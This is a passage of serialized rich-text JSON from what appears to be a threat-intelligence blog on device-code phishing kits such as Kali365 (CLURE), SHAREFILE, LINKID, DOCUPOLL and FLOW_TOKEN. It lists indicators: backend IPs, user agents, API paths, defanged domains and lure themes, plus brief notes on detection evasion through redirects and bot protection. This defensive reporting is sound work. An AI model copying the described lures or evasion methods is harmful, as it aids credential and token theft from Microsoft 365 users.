",{"data":13758,"content":13759,"nodeType":940},{"uri":8582},[13760],{"data":13761,"marks":13762,"value":13764,"nodeType":883},{},[13763],{"type":948},"detection evasion techniques",{"data":13766,"marks":13767,"value":13768,"nodeType":883},{},[]," we've come to associate with PhaaS kits in the AiTM space — using multiple redirects through trusted sites before serving the malicious page, using bot protection to block security tools from analyzing the page, and so on. It also uses a pop-up window for the device code entry rather than a redirect, reducing the friction for the victim (it looks pretty convincing, too).",{"data":13770,"content":13774,"nodeType":971},{"target":13771},{"sys":13772},{"id":13773,"type":976,"linkType":977},"73rNOIEDPfP5IJwpFaxVc2",[],{"data":13776,"content":13780,"nodeType":971},{"target":13777},{"sys":13778},{"id":13779,"type":976,"linkType":977},"5BJSvOQUW9UpsQtoDNtgTC",[],{"data":13782,"content":13786,"nodeType":971},{"target":13783},{"sys":13784},{"id":13785,"type":976,"linkType":977},"3dbePPxVb4h4SauGg3glIL",[],{"data":13788,"content":13792,"nodeType":971},{"target":13789},{"sys":13790},{"id":13791,"type":976,"linkType":977},"1UOLcmNQvOsL5tdLSVuviq",[],{"data":13794,"content":13798,"nodeType":971},{"target":13795},{"sys":13796},{"id":13797,"type":976,"linkType":977},"55XRqLSwUUi2D4ZVpJboml",[],{"data":13800,"content":13804,"nodeType":971},{"target":13801},{"sys":13802},{"id":13803,"type":976,"linkType":977},"5wg5yr2Lo8t3f72ZV815c",[],{"data":13806,"content":13810,"nodeType":971},{"target":13807},{"sys":13808},{"id":13809,"type":976,"linkType":977},"35cowlL6i3rkGXOGmSxlI1",[],{"data":13812,"content":13813,"nodeType":879},{},[13814],{"data":13815,"marks":13816,"value":21,"nodeType":883},{},[],{"data":13818,"content":13819,"nodeType":8845},{},[13820,13844,13927,13979,14003],{"data":13821,"content":13822,"nodeType":8752},{},[13823,13834],{"data":13824,"content":13825,"nodeType":8766},{},[13826],{"data":13827,"content":13828,"nodeType":879},{},[13829],{"data":13830,"marks":13831,"value":13833,"nodeType":883},{},[13832],{"type":916},"Frontend infrastructure",{"data":13835,"content":13836,"nodeType":8766},{},[13837],{"data":13838,"content":13839,"nodeType":879},{},[13840],{"data":13841,"marks":13842,"value":13843,"nodeType":883},{},[],"Workers.dev, vercel.app, github.io, fastly.net, edgeone.dev",{"data":13845,"content":13846,"nodeType":8752},{},[13847,13858],{"data":13848,"content":13849,"nodeType":8766},{},[13850],{"data":13851,"content":13852,"nodeType":879},{},[13853],{"data":13854,"marks":13855,"value":13857,"nodeType":883},{},[13856],{"type":916},"Backend infrastructure",{"data":13859,"content":13860,"nodeType":8766},{},[13861,13891],{"data":13862,"content":13863,"nodeType":879},{},[13864,13869,13873,13878,13882,13887],{"data":13865,"marks":13866,"value":13868,"nodeType":883},{},[13867],{"type":916},"Example IP: (V3) ",{"data":13870,"marks":13871,"value":13872,"nodeType":883},{},[],"162.220.232.71 (Railway AS400940) ",{"data":13874,"marks":13875,"value":13877,"nodeType":883},{},[13876],{"type":916},"(V2)",{"data":13879,"marks":13880,"value":13881,"nodeType":883},{},[]," 71.11.42.193 ",{"data":13883,"marks":13884,"value":13886,"nodeType":883},{},[13885],{"type":916},"(V1) ",{"data":13888,"marks":13889,"value":13890,"nodeType":883},{},[],"72.218.25.107",{"data":13892,"content":13893,"nodeType":879},{},[13894,13899,13902,13907,13911,13915,13919,13923],{"data":13895,"marks":13896,"value":13898,"nodeType":883},{},[13897],{"type":916},"Backend User Agent:",{"data":13900,"marks":13901,"value":951,"nodeType":883},{},[],{"data":13903,"marks":13904,"value":13906,"nodeType":883},{},[13905],{"type":916},"(V3) ",{"data":13908,"marks":13909,"value":13910,"nodeType":883},{},[],"node, ",{"data":13912,"marks":13913,"value":13877,"nodeType":883},{},[13914],{"type":916},{"data":13916,"marks":13917,"value":13918,"nodeType":883},{},[],", Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F73.0.3683 Safari\u002F537.36 OPR\u002F57.0.3098.91 ",{"data":13920,"marks":13921,"value":13886,"nodeType":883},{},[13922],{"type":916},{"data":13924,"marks":13925,"value":13926,"nodeType":883},{},[],"Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F71.0.3578.98 Safari\u002F537.36 OPR\u002F56.0.3051.52 ",{"data":13928,"content":13929,"nodeType":8752},{},[13930,13941],{"data":13931,"content":13932,"nodeType":8766},{},[13933],{"data":13934,"content":13935,"nodeType":879},{},[13936],{"data":13937,"marks":13938,"value":13940,"nodeType":883},{},[13939],{"type":916},"Network paths",{"data":13942,"content":13943,"nodeType":8766},{},[13944,13951,13958,13965,13972],{"data":13945,"content":13946,"nodeType":879},{},[13947],{"data":13948,"marks":13949,"value":13950,"nodeType":883},{},[],"\u002Fapi\u002Frate-limit ",{"data":13952,"content":13953,"nodeType":879},{},[13954],{"data":13955,"marks":13956,"value":13957,"nodeType":883},{},[],"\u002Fapi\u002Ffingerprint ",{"data":13959,"content":13960,"nodeType":879},{},[13961],{"data":13962,"marks":13963,"value":13964,"nodeType":883},{},[],"\u002Fapi\u002Fcaptcha-verify ",{"data":13966,"content":13967,"nodeType":879},{},[13968],{"data":13969,"marks":13970,"value":13971,"nodeType":883},{},[],"\u002Fapi\u002Finit \u002Fapi\u002Fgenerate-code ",{"data":13973,"content":13974,"nodeType":879},{},[13975],{"data":13976,"marks":13977,"value":13978,"nodeType":883},{},[],"\u002Fapi\u002Fcheck-auth",{"data":13980,"content":13981,"nodeType":8752},{},[13982,13993],{"data":13983,"content":13984,"nodeType":8766},{},[13985],{"data":13986,"content":13987,"nodeType":879},{},[13988],{"data":13989,"marks":13990,"value":13992,"nodeType":883},{},[13991],{"type":916},"Lure themes",{"data":13994,"content":13995,"nodeType":8766},{},[13996],{"data":13997,"content":13998,"nodeType":879},{},[13999],{"data":14000,"marks":14001,"value":14002,"nodeType":883},{},[],"Various MS lures (e.g. Outlook, SharePoint, Teams) DocuSign, Adobe",{"data":14004,"content":14005,"nodeType":8752},{},[14006,14017],{"data":14007,"content":14008,"nodeType":8766},{},[14009],{"data":14010,"content":14011,"nodeType":879},{},[14012],{"data":14013,"marks":14014,"value":14016,"nodeType":883},{},[14015],{"type":916},"Example Domain",{"data":14018,"content":14019,"nodeType":8766},{},[14020,14032,14044,14056,14068],{"data":14021,"content":14022,"nodeType":879},{},[14023,14028],{"data":14024,"marks":14025,"value":14027,"nodeType":883},{},[14026],{"type":916},"Precursor A:",{"data":14029,"marks":14030,"value":14031,"nodeType":883},{},[]," teams-zpfvwnpxuc[.]edgeone.dev",{"data":14033,"content":14034,"nodeType":879},{},[14035,14040],{"data":14036,"marks":14037,"value":14039,"nodeType":883},{},[14038],{"type":916},"Precursor B: ",{"data":14041,"marks":14042,"value":14043,"nodeType":883},{},[],"authenticate-m365-accountsecurity-m-pi[.]vercel.app",{"data":14045,"content":14046,"nodeType":879},{},[14047,14052],{"data":14048,"marks":14049,"value":14051,"nodeType":883},{},[14050],{"type":916},"Courts Access: ",{"data":14053,"marks":14054,"value":14055,"nodeType":883},{},[],"secure-systems-validations-courts[.]vercel.app",{"data":14057,"content":14058,"nodeType":879},{},[14059,14064],{"data":14060,"marks":14061,"value":14063,"nodeType":883},{},[14062],{"type":916},"Early ANTIBOT:",{"data":14065,"marks":14066,"value":14067,"nodeType":883},{},[]," interface-auth-en-useast[.]global.ssl.fastly.net",{"data":14069,"content":14070,"nodeType":879},{},[14071,14076],{"data":14072,"marks":14073,"value":14075,"nodeType":883},{},[14074],{"type":916},"Production ANTIBOT: ",{"data":14077,"marks":14078,"value":14079,"nodeType":883},{},[],"index-z059-document-pending-reviewsign-xlss7994824[.]awalizer[.]workers.dev",{"data":14081,"content":14082,"nodeType":905},{},[],{"data":14084,"content":14085,"nodeType":1036},{},[14086],{"data":14087,"marks":14088,"value":14090,"nodeType":883},{},[14089],{"type":916},"“SHAREFILE”",{"data":14092,"content":14093,"nodeType":8845},{},[14094,14117,14156,14179,14202],{"data":14095,"content":14096,"nodeType":8752},{},[14097,14107],{"data":14098,"content":14099,"nodeType":8766},{},[14100],{"data":14101,"content":14102,"nodeType":879},{},[14103],{"data":14104,"marks":14105,"value":13833,"nodeType":883},{},[14106],{"type":916},{"data":14108,"content":14109,"nodeType":8766},{},[14110],{"data":14111,"content":14112,"nodeType":879},{},[14113],{"data":14114,"marks":14115,"value":14116,"nodeType":883},{},[],"No hosting markers visible.",{"data":14118,"content":14119,"nodeType":8752},{},[14120,14130],{"data":14121,"content":14122,"nodeType":8766},{},[14123],{"data":14124,"content":14125,"nodeType":879},{},[14126],{"data":14127,"marks":14128,"value":13857,"nodeType":883},{},[14129],{"type":916},{"data":14131,"content":14132,"nodeType":8766},{},[14133,14145],{"data":14134,"content":14135,"nodeType":879},{},[14136,14141],{"data":14137,"marks":14138,"value":14140,"nodeType":883},{},[14139],{"type":916},"Example IP:",{"data":14142,"marks":14143,"value":14144,"nodeType":883},{},[]," 147.45.60.47 (Global Connectivity Solutions LLP AS215540)",{"data":14146,"content":14147,"nodeType":879},{},[14148,14152],{"data":14149,"marks":14150,"value":13898,"nodeType":883},{},[14151],{"type":916},{"data":14153,"marks":14154,"value":14155,"nodeType":883},{},[]," node",{"data":14157,"content":14158,"nodeType":8752},{},[14159,14169],{"data":14160,"content":14161,"nodeType":8766},{},[14162],{"data":14163,"content":14164,"nodeType":879},{},[14165],{"data":14166,"marks":14167,"value":13940,"nodeType":883},{},[14168],{"type":916},{"data":14170,"content":14171,"nodeType":8766},{},[14172],{"data":14173,"content":14174,"nodeType":879},{},[14175],{"data":14176,"marks":14177,"value":14178,"nodeType":883},{},[],"POST \u002Fapi\u002Fdevice\u002Fstart  POST \u002Fapi\u002Fdevice\u002Fpoll",{"data":14180,"content":14181,"nodeType":8752},{},[14182,14192],{"data":14183,"content":14184,"nodeType":8766},{},[14185],{"data":14186,"content":14187,"nodeType":879},{},[14188],{"data":14189,"marks":14190,"value":13992,"nodeType":883},{},[14191],{"type":916},{"data":14193,"content":14194,"nodeType":8766},{},[14195],{"data":14196,"content":14197,"nodeType":879},{},[14198],{"data":14199,"marks":14200,"value":14201,"nodeType":883},{},[],"Citrix ShareFile document transfer — file card with sender info, expiry warning, download\u002Fpreview buttons",{"data":14203,"content":14204,"nodeType":8752},{},[14205,14216],{"data":14206,"content":14207,"nodeType":8766},{},[14208],{"data":14209,"content":14210,"nodeType":879},{},[14211],{"data":14212,"marks":14213,"value":14215,"nodeType":883},{},[14214],{"type":916},"Example domain",{"data":14217,"content":14218,"nodeType":8766},{},[14219],{"data":14220,"content":14221,"nodeType":879},{},[14222],{"data":14223,"marks":14224,"value":14225,"nodeType":883},{},[],"cghdfg[.]vbchkioi[.]su",{"data":14227,"content":14231,"nodeType":971},{"target":14228},{"sys":14229},{"id":14230,"type":976,"linkType":977},"1TtZ6VsMSTlPvy7W996w9E",[],{"data":14233,"content":14234,"nodeType":905},{},[],{"data":14236,"content":14237,"nodeType":1036},{},[14238],{"data":14239,"marks":14240,"value":14242,"nodeType":883},{},[14241],{"type":916},"Kali365 (internal name “CLURE”)",{"data":14244,"content":14245,"nodeType":879},{},[14246,14250,14254,14258,14266,14270,14278],{"data":14247,"marks":14248,"value":14249,"nodeType":883},{},[],"Clure was recently linked to the ",{"data":14251,"marks":14252,"value":2404,"nodeType":883},{},[14253],{"type":916},{"data":14255,"marks":14256,"value":14257,"nodeType":883},{},[]," PhaaS platform based on an ",{"data":14259,"content":14261,"nodeType":940},{"uri":14260},"https:\u002F\u002Fwww.ic3.gov\u002FPSA\u002F2026\u002FPSA260521",[14262],{"data":14263,"marks":14264,"value":14265,"nodeType":883},{},[],"FBI advisory",{"data":14267,"marks":14268,"value":14269,"nodeType":883},{},[]," and additional research from ",{"data":14271,"content":14273,"nodeType":940},{"uri":14272},"https:\u002F\u002Farcticwolf.com\u002Fresources\u002Fblog\u002Ftoken-bingo-dont-let-your-code-be-the-winner\u002F",[14274],{"data":14275,"marks":14276,"value":14277,"nodeType":883},{},[],"Arctic Wolf",{"data":14279,"marks":14280,"value":14281,"nodeType":883},{},[],". This is yet another example of Device Code Phishing and AiTM phishing capabilities being integrated into unified phishing platforms. ",{"data":14283,"content":14284,"nodeType":8845},{},[14285,14308,14347,14370,14393],{"data":14286,"content":14287,"nodeType":8752},{},[14288,14298],{"data":14289,"content":14290,"nodeType":8766},{},[14291],{"data":14292,"content":14293,"nodeType":879},{},[14294],{"data":14295,"marks":14296,"value":13833,"nodeType":883},{},[14297],{"type":916},{"data":14299,"content":14300,"nodeType":8766},{},[14301],{"data":14302,"content":14303,"nodeType":879},{},[14304],{"data":14305,"marks":14306,"value":14307,"nodeType":883},{},[],"API on api.duemineral.uk:8443 and api.loadingdocuments.uk:8443 (rotates). ",{"data":14309,"content":14310,"nodeType":8752},{},[14311,14321],{"data":14312,"content":14313,"nodeType":8766},{},[14314],{"data":14315,"content":14316,"nodeType":879},{},[14317],{"data":14318,"marks":14319,"value":13857,"nodeType":883},{},[14320],{"type":916},{"data":14322,"content":14323,"nodeType":8766},{},[14324,14336],{"data":14325,"content":14326,"nodeType":879},{},[14327,14332],{"data":14328,"marks":14329,"value":14331,"nodeType":883},{},[14330],{"type":916},"Example IP: ",{"data":14333,"marks":14334,"value":14335,"nodeType":883},{},[],"162.243.166.119 (DigitalOcean AS14061)",{"data":14337,"content":14338,"nodeType":879},{},[14339,14343],{"data":14340,"marks":14341,"value":13898,"nodeType":883},{},[14342],{"type":916},{"data":14344,"marks":14345,"value":14346,"nodeType":883},{},[]," python-requests\u002F2.32.5",{"data":14348,"content":14349,"nodeType":8752},{},[14350,14360],{"data":14351,"content":14352,"nodeType":8766},{},[14353],{"data":14354,"content":14355,"nodeType":879},{},[14356],{"data":14357,"marks":14358,"value":13940,"nodeType":883},{},[14359],{"type":916},{"data":14361,"content":14362,"nodeType":8766},{},[14363],{"data":14364,"content":14365,"nodeType":879},{},[14366],{"data":14367,"marks":14368,"value":14369,"nodeType":883},{},[],"GET \u002Fapi\u002Fstatus\u002F{numeric_SID} (port :8443)",{"data":14371,"content":14372,"nodeType":8752},{},[14373,14383],{"data":14374,"content":14375,"nodeType":8766},{},[14376],{"data":14377,"content":14378,"nodeType":879},{},[14379],{"data":14380,"marks":14381,"value":13992,"nodeType":883},{},[14382],{"type":916},{"data":14384,"content":14385,"nodeType":8766},{},[14386],{"data":14387,"content":14388,"nodeType":879},{},[14389],{"data":14390,"marks":14391,"value":14392,"nodeType":883},{},[],"SharePoint \"Team Site\" doc library, SharePoint \"Shared Document\" individual share",{"data":14394,"content":14395,"nodeType":8752},{},[14396,14406],{"data":14397,"content":14398,"nodeType":8766},{},[14399],{"data":14400,"content":14401,"nodeType":879},{},[14402],{"data":14403,"marks":14404,"value":14215,"nodeType":883},{},[14405],{"type":916},{"data":14407,"content":14408,"nodeType":8766},{},[14409],{"data":14410,"content":14411,"nodeType":879},{},[14412],{"data":14413,"marks":14414,"value":14415,"nodeType":883},{},[],"auth[.]duemineral[.]uk",{"data":14417,"content":14421,"nodeType":971},{"target":14418},{"sys":14419},{"id":14420,"type":976,"linkType":977},"Y1AiT3dJRTXz64pb68kca",[],{"data":14423,"content":14424,"nodeType":905},{},[],{"data":14426,"content":14427,"nodeType":1036},{},[14428],{"data":14429,"marks":14430,"value":14432,"nodeType":883},{},[14431],{"type":916},"“LINKID”",{"data":14434,"content":14435,"nodeType":8845},{},[14436,14459,14504,14534,14557],{"data":14437,"content":14438,"nodeType":8752},{},[14439,14449],{"data":14440,"content":14441,"nodeType":8766},{},[14442],{"data":14443,"content":14444,"nodeType":879},{},[14445],{"data":14446,"marks":14447,"value":13833,"nodeType":883},{},[14448],{"type":916},{"data":14450,"content":14451,"nodeType":8766},{},[14452],{"data":14453,"content":14454,"nodeType":879},{},[14455],{"data":14456,"marks":14457,"value":14458,"nodeType":883},{},[],"Adobe variant has Cloudflare challenge-platform iframe (CF-protected origin). Relative API paths — self-hosted.",{"data":14460,"content":14461,"nodeType":8752},{},[14462,14472],{"data":14463,"content":14464,"nodeType":8766},{},[14465],{"data":14466,"content":14467,"nodeType":879},{},[14468],{"data":14469,"marks":14470,"value":13857,"nodeType":883},{},[14471],{"type":916},{"data":14473,"content":14474,"nodeType":8766},{},[14475,14486,14493],{"data":14476,"content":14477,"nodeType":879},{},[14478,14482],{"data":14479,"marks":14480,"value":14331,"nodeType":883},{},[14481],{"type":916},{"data":14483,"marks":14484,"value":14485,"nodeType":883},{},[],"185.176.220.22 (2cloud.eu AS39845)",{"data":14487,"content":14488,"nodeType":879},{},[14489],{"data":14490,"marks":14491,"value":14492,"nodeType":883},{},[],"2600:1f10:470d:9a00:1437:ec30:be61:3494 (AWS AS16509)",{"data":14494,"content":14495,"nodeType":879},{},[14496,14500],{"data":14497,"marks":14498,"value":13898,"nodeType":883},{},[14499],{"type":916},{"data":14501,"marks":14502,"value":14503,"nodeType":883},{},[]," axios\u002F1.10.0 , axios\u002F1.13.6",{"data":14505,"content":14506,"nodeType":8752},{},[14507,14517],{"data":14508,"content":14509,"nodeType":8766},{},[14510],{"data":14511,"content":14512,"nodeType":879},{},[14513],{"data":14514,"marks":14515,"value":13940,"nodeType":883},{},[14516],{"type":916},{"data":14518,"content":14519,"nodeType":8766},{},[14520,14527],{"data":14521,"content":14522,"nodeType":879},{},[14523],{"data":14524,"marks":14525,"value":14526,"nodeType":883},{},[],"POST \u002Fapi\u002Fdevice\u002Fstart",{"data":14528,"content":14529,"nodeType":879},{},[14530],{"data":14531,"marks":14532,"value":14533,"nodeType":883},{},[],"GET \u002Fapi\u002Fdevice\u002Fstatus\u002F{sessionId}",{"data":14535,"content":14536,"nodeType":8752},{},[14537,14547],{"data":14538,"content":14539,"nodeType":8766},{},[14540],{"data":14541,"content":14542,"nodeType":879},{},[14543],{"data":14544,"marks":14545,"value":13992,"nodeType":883},{},[14546],{"type":916},{"data":14548,"content":14549,"nodeType":8766},{},[14550],{"data":14551,"content":14552,"nodeType":879},{},[14553],{"data":14554,"marks":14555,"value":14556,"nodeType":883},{},[],"MS Teams meeting invitation (with interactive date\u002Ftime picker), Adobe Acrobat Sign document review",{"data":14558,"content":14559,"nodeType":8752},{},[14560,14570],{"data":14561,"content":14562,"nodeType":8766},{},[14563],{"data":14564,"content":14565,"nodeType":879},{},[14566],{"data":14567,"marks":14568,"value":14215,"nodeType":883},{},[14569],{"type":916},{"data":14571,"content":14572,"nodeType":8766},{},[14573],{"data":14574,"content":14575,"nodeType":879},{},[14576],{"data":14577,"marks":14578,"value":14579,"nodeType":883},{},[],"sdtr-site[.]cfd",{"data":14581,"content":14585,"nodeType":971},{"target":14582},{"sys":14583},{"id":14584,"type":976,"linkType":977},"22hsIzlkptC2JTIUtbOuUn",[],{"data":14587,"content":14588,"nodeType":905},{},[],{"data":14590,"content":14591,"nodeType":1036},{},[14592],{"data":14593,"marks":14594,"value":14596,"nodeType":883},{},[14595],{"type":916},"Device Code Lab (formerly codename \"AUTHOV”)",{"data":14598,"content":14602,"nodeType":971},{"target":14599},{"sys":14600},{"id":14601,"type":976,"linkType":977},"5vllVaa0Ry0wKs46ssrZLC",[],{"data":14604,"content":14605,"nodeType":8845},{},[14606,14629,14675,14698,14721],{"data":14607,"content":14608,"nodeType":8752},{},[14609,14619],{"data":14610,"content":14611,"nodeType":8766},{},[14612],{"data":14613,"content":14614,"nodeType":879},{},[14615],{"data":14616,"marks":14617,"value":13833,"nodeType":883},{},[14618],{"type":916},{"data":14620,"content":14621,"nodeType":8766},{},[14622],{"data":14623,"content":14624,"nodeType":879},{},[14625],{"data":14626,"marks":14627,"value":14628,"nodeType":883},{},[],"workers.dev",{"data":14630,"content":14631,"nodeType":8752},{},[14632,14642],{"data":14633,"content":14634,"nodeType":8766},{},[14635],{"data":14636,"content":14637,"nodeType":879},{},[14638],{"data":14639,"marks":14640,"value":13857,"nodeType":883},{},[14641],{"type":916},{"data":14643,"content":14644,"nodeType":8766},{},[14645,14656],{"data":14646,"content":14647,"nodeType":879},{},[14648,14652],{"data":14649,"marks":14650,"value":14331,"nodeType":883},{},[14651],{"type":916},{"data":14653,"marks":14654,"value":14655,"nodeType":883},{},[],"192.3.225.100 (HostPapa \u002F ColoCrossing AS36352)",{"data":14657,"content":14658,"nodeType":879},{},[14659,14663,14666,14671],{"data":14660,"marks":14661,"value":13898,"nodeType":883},{},[14662],{"type":916},{"data":14664,"marks":14665,"value":951,"nodeType":883},{},[],{"data":14667,"marks":14668,"value":14670,"nodeType":883},{},[14669],{"type":916}," ",{"data":14672,"marks":14673,"value":14674,"nodeType":883},{},[],"python-httpx\u002F0.28.1",{"data":14676,"content":14677,"nodeType":8752},{},[14678,14688],{"data":14679,"content":14680,"nodeType":8766},{},[14681],{"data":14682,"content":14683,"nodeType":879},{},[14684],{"data":14685,"marks":14686,"value":13940,"nodeType":883},{},[14687],{"type":916},{"data":14689,"content":14690,"nodeType":8766},{},[14691],{"data":14692,"content":14693,"nodeType":879},{},[14694],{"data":14695,"marks":14696,"value":14697,"nodeType":883},{},[],"GET \u002Flanding\u002Fapi\u002Fsession-status?session_id=&token=",{"data":14699,"content":14700,"nodeType":8752},{},[14701,14711],{"data":14702,"content":14703,"nodeType":8766},{},[14704],{"data":14705,"content":14706,"nodeType":879},{},[14707],{"data":14708,"marks":14709,"value":13992,"nodeType":883},{},[14710],{"type":916},{"data":14712,"content":14713,"nodeType":8766},{},[14714],{"data":14715,"content":14716,"nodeType":879},{},[14717],{"data":14718,"marks":14719,"value":14720,"nodeType":883},{},[],"Adobe Acrobat document sharing (PDF preview, sender avatar)",{"data":14722,"content":14723,"nodeType":8752},{},[14724,14734],{"data":14725,"content":14726,"nodeType":8766},{},[14727],{"data":14728,"content":14729,"nodeType":879},{},[14730],{"data":14731,"marks":14732,"value":14215,"nodeType":883},{},[14733],{"type":916},{"data":14735,"content":14736,"nodeType":8766},{},[14737],{"data":14738,"content":14739,"nodeType":879},{},[14740],{"data":14741,"marks":14742,"value":14743,"nodeType":883},{},[],"milosh-solibella-0dcio[.]sgttommy.workers.dev",{"data":14745,"content":14749,"nodeType":971},{"target":14746},{"sys":14747},{"id":14748,"type":976,"linkType":977},"6szO6IKJ32usyxIKX1efZy",[],{"data":14751,"content":14755,"nodeType":971},{"target":14752},{"sys":14753},{"id":14754,"type":976,"linkType":977},"lEqV3RTMIY8y011lnhX7P",[],{"data":14757,"content":14758,"nodeType":905},{},[],{"data":14760,"content":14761,"nodeType":1036},{},[14762],{"data":14763,"marks":14764,"value":14766,"nodeType":883},{},[14765],{"type":916},"“DOCUPOLL”",{"data":14768,"content":14769,"nodeType":8845},{},[14770,14793,14831,14868,14891],{"data":14771,"content":14772,"nodeType":8752},{},[14773,14783],{"data":14774,"content":14775,"nodeType":8766},{},[14776],{"data":14777,"content":14778,"nodeType":879},{},[14779],{"data":14780,"marks":14781,"value":13833,"nodeType":883},{},[14782],{"type":916},{"data":14784,"content":14785,"nodeType":8766},{},[14786],{"data":14787,"content":14788,"nodeType":879},{},[14789],{"data":14790,"marks":14791,"value":14792,"nodeType":883},{},[],"Github.io and workers.dev hosting",{"data":14794,"content":14795,"nodeType":8752},{},[14796,14806],{"data":14797,"content":14798,"nodeType":8766},{},[14799],{"data":14800,"content":14801,"nodeType":879},{},[14802],{"data":14803,"marks":14804,"value":13857,"nodeType":883},{},[14805],{"type":916},{"data":14807,"content":14808,"nodeType":8766},{},[14809,14820],{"data":14810,"content":14811,"nodeType":879},{},[14812,14816],{"data":14813,"marks":14814,"value":14331,"nodeType":883},{},[14815],{"type":916},{"data":14817,"marks":14818,"value":14819,"nodeType":883},{},[],"144.172.103.240 (FranTech Solutions \u002F RouterHosting \u002F Cloudzy AS14956)",{"data":14821,"content":14822,"nodeType":879},{},[14823,14827],{"data":14824,"marks":14825,"value":13898,"nodeType":883},{},[14826],{"type":916},{"data":14828,"marks":14829,"value":14830,"nodeType":883},{},[]," Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F70.0.3538.102 Safari\u002F537.36 Edge\u002F18.19042",{"data":14832,"content":14833,"nodeType":8752},{},[14834,14844],{"data":14835,"content":14836,"nodeType":8766},{},[14837],{"data":14838,"content":14839,"nodeType":879},{},[14840],{"data":14841,"marks":14842,"value":13940,"nodeType":883},{},[14843],{"type":916},{"data":14845,"content":14846,"nodeType":8766},{},[14847,14854,14861],{"data":14848,"content":14849,"nodeType":879},{},[14850],{"data":14851,"marks":14852,"value":14853,"nodeType":883},{},[],"POST \u002Fapi\u002Fv1\u002Flanding-pages\u002Fpublic\u002F{slug}\u002Finit",{"data":14855,"content":14856,"nodeType":879},{},[14857],{"data":14858,"marks":14859,"value":14860,"nodeType":883},{},[],"POST ...\u002Fpoll",{"data":14862,"content":14863,"nodeType":879},{},[14864],{"data":14865,"marks":14866,"value":14867,"nodeType":883},{},[],"POST ...\u002Ftrack",{"data":14869,"content":14870,"nodeType":8752},{},[14871,14881],{"data":14872,"content":14873,"nodeType":8766},{},[14874],{"data":14875,"content":14876,"nodeType":879},{},[14877],{"data":14878,"marks":14879,"value":13992,"nodeType":883},{},[14880],{"type":916},{"data":14882,"content":14883,"nodeType":8766},{},[14884],{"data":14885,"content":14886,"nodeType":879},{},[14887],{"data":14888,"marks":14889,"value":14890,"nodeType":883},{},[],"DocuSign document signing. One sample is a full scrape of real docusign.com (free-account page) with kit injected.",{"data":14892,"content":14893,"nodeType":8752},{},[14894,14904],{"data":14895,"content":14896,"nodeType":8766},{},[14897],{"data":14898,"content":14899,"nodeType":879},{},[14900],{"data":14901,"marks":14902,"value":14215,"nodeType":883},{},[14903],{"type":916},{"data":14905,"content":14906,"nodeType":8766},{},[14907],{"data":14908,"content":14909,"nodeType":879},{},[14910],{"data":14911,"marks":14912,"value":14913,"nodeType":883},{},[],"docufirmar[.]github.io",{"data":14915,"content":14919,"nodeType":971},{"target":14916},{"sys":14917},{"id":14918,"type":976,"linkType":977},"6Y1XABHnQD82R3MW80HnQZ",[],{"data":14921,"content":14922,"nodeType":905},{},[],{"data":14924,"content":14925,"nodeType":1036},{},[14926],{"data":14927,"marks":14928,"value":14930,"nodeType":883},{},[14929],{"type":916},"“FLOW_TOKEN”",{"data":14932,"content":14933,"nodeType":8845},{},[14934,14956,15001,15031,15054],{"data":14935,"content":14936,"nodeType":8752},{},[14937,14947],{"data":14938,"content":14939,"nodeType":8766},{},[14940],{"data":14941,"content":14942,"nodeType":879},{},[14943],{"data":14944,"marks":14945,"value":13833,"nodeType":883},{},[14946],{"type":916},{"data":14948,"content":14949,"nodeType":8766},{},[14950],{"data":14951,"content":14952,"nodeType":879},{},[14953],{"data":14954,"marks":14955,"value":14628,"nodeType":883},{},[],{"data":14957,"content":14958,"nodeType":8752},{},[14959,14969],{"data":14960,"content":14961,"nodeType":8766},{},[14962],{"data":14963,"content":14964,"nodeType":879},{},[14965],{"data":14966,"marks":14967,"value":13857,"nodeType":883},{},[14968],{"type":916},{"data":14970,"content":14971,"nodeType":8766},{},[14972,14983],{"data":14973,"content":14974,"nodeType":879},{},[14975,14979],{"data":14976,"marks":14977,"value":14331,"nodeType":883},{},[14978],{"type":916},{"data":14980,"marks":14981,"value":14982,"nodeType":883},{},[],"43.166.163.163 (Tencent Cloud AS132203)",{"data":14984,"content":14985,"nodeType":879},{},[14986,14990,14993,14997],{"data":14987,"marks":14988,"value":13898,"nodeType":883},{},[14989],{"type":916},{"data":14991,"marks":14992,"value":951,"nodeType":883},{},[],{"data":14994,"marks":14995,"value":14670,"nodeType":883},{},[14996],{"type":916},{"data":14998,"marks":14999,"value":15000,"nodeType":883},{},[],"(null)",{"data":15002,"content":15003,"nodeType":8752},{},[15004,15014],{"data":15005,"content":15006,"nodeType":8766},{},[15007],{"data":15008,"content":15009,"nodeType":879},{},[15010],{"data":15011,"marks":15012,"value":13940,"nodeType":883},{},[15013],{"type":916},{"data":15015,"content":15016,"nodeType":8766},{},[15017,15024],{"data":15018,"content":15019,"nodeType":879},{},[15020],{"data":15021,"marks":15022,"value":15023,"nodeType":883},{},[],"POST \u002Fapi\u002Fhandler.php ",{"data":15025,"content":15026,"nodeType":879},{},[15027],{"data":15028,"marks":15029,"value":15030,"nodeType":883},{},[],"(actions: device_code_generate, device_code_poll_public)",{"data":15032,"content":15033,"nodeType":8752},{},[15034,15044],{"data":15035,"content":15036,"nodeType":8766},{},[15037],{"data":15038,"content":15039,"nodeType":879},{},[15040],{"data":15041,"marks":15042,"value":13992,"nodeType":883},{},[15043],{"type":916},{"data":15045,"content":15046,"nodeType":8766},{},[15047],{"data":15048,"content":15049,"nodeType":879},{},[15050],{"data":15051,"marks":15052,"value":15053,"nodeType":883},{},[],"DocuSign \"Salary Adjustment Document — 2026\", Microsoft banner · HR Department 